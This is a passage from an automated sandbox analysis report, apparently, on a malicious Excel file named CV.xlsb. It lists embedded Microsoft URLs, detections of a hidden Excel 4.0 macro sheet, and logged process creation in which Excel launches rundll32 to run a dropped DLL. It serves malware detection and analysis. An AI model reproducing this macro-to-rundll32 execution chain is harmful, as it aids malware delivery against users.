Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://clients.config.office.net/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://config.edge.skype.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://cortana.ai
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://cr.office.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://devnull.onenote.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://directory.services.
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://graph.windows.net
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://graph.windows.net/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://lifecycle.office.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://login.windows.local
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://management.azure.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://management.azure.com/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://messaging.office.com/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://ncus-000.contentsync.
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://officeapps.live.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://onedrive.live.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://outlook.office.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://outlook.office365.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://settings.outlook.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://tasks.office.com
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://wus2-000.contentsync.
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 2C22A230-8394-4D0B-8F76-0E2534DC8A73.0.drString found in binary or memory: https://www.odwebp.svc.ms

System Summary:

barindex
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: CV.xlsbInitial sample: CALL
Source: CV.xlsbInitial sample: CALL
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: CV.xlsbInitial sample: Sheet size: 777285
Source: CV.xlsbInitial sample: Sheet size: 777285
Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: sfc.dllJump to behavior
Source: classification engineClassification label: mal76.expl.evad.winXLSB@3/4@0/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{D4802928-553D-4E9C-922B-548B6D7B447D} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{D4802928-553D-4E9C-922B-548B6D7B447D} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer
Source: CV.xlsbReversingLabs: Detection: 12%
Source: CV.xlsbReversingLabs: Detection: 12%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServerJump to behavior
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServerJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
